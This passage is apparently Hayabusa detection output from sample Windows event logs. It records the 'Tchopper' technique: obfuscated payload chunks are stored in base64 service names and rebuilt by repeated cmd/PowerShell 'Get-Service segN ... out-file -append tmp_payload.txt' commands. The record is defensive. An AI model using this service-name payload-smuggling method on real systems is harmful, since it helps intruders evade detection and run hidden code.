2021-11-03 17:21:08.597 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:10.084 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:10.084 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:10.084 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyBDb25uZWN0aW9uIElzc3VlKHMpIg== | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg245"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:34:27.978 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:27.993 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg1"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:29.447 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:29.447 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg2"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:30.888 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:30.888 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg3"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xebc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:32.339 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:32.339 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg4"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:33.784 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe0c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:33.784 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg5"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:35.386 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:35.401 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg6"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xad8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:36.836 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:36.836 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg7"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:38.274 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:38.290 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg8"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf2c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:39.743 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:39.743 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:41.196 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6b8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:41.196 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x708 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:42.635 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe88 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:42.651 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:44.108 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf78 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:44.108 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaec | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:45.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:45.565 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:47.024 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x420 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:47.024 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x20c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:48.467 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:48.482 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcd0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:49.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:34:49.925 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:51.386 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:51.386 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:52.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:52.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:54.271 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:54.287 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:55.740 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: 
C:\Windows\System32\cmd.exe | PID: 0x9ac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:55.740 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:57.207 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:34:57.207 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x28c 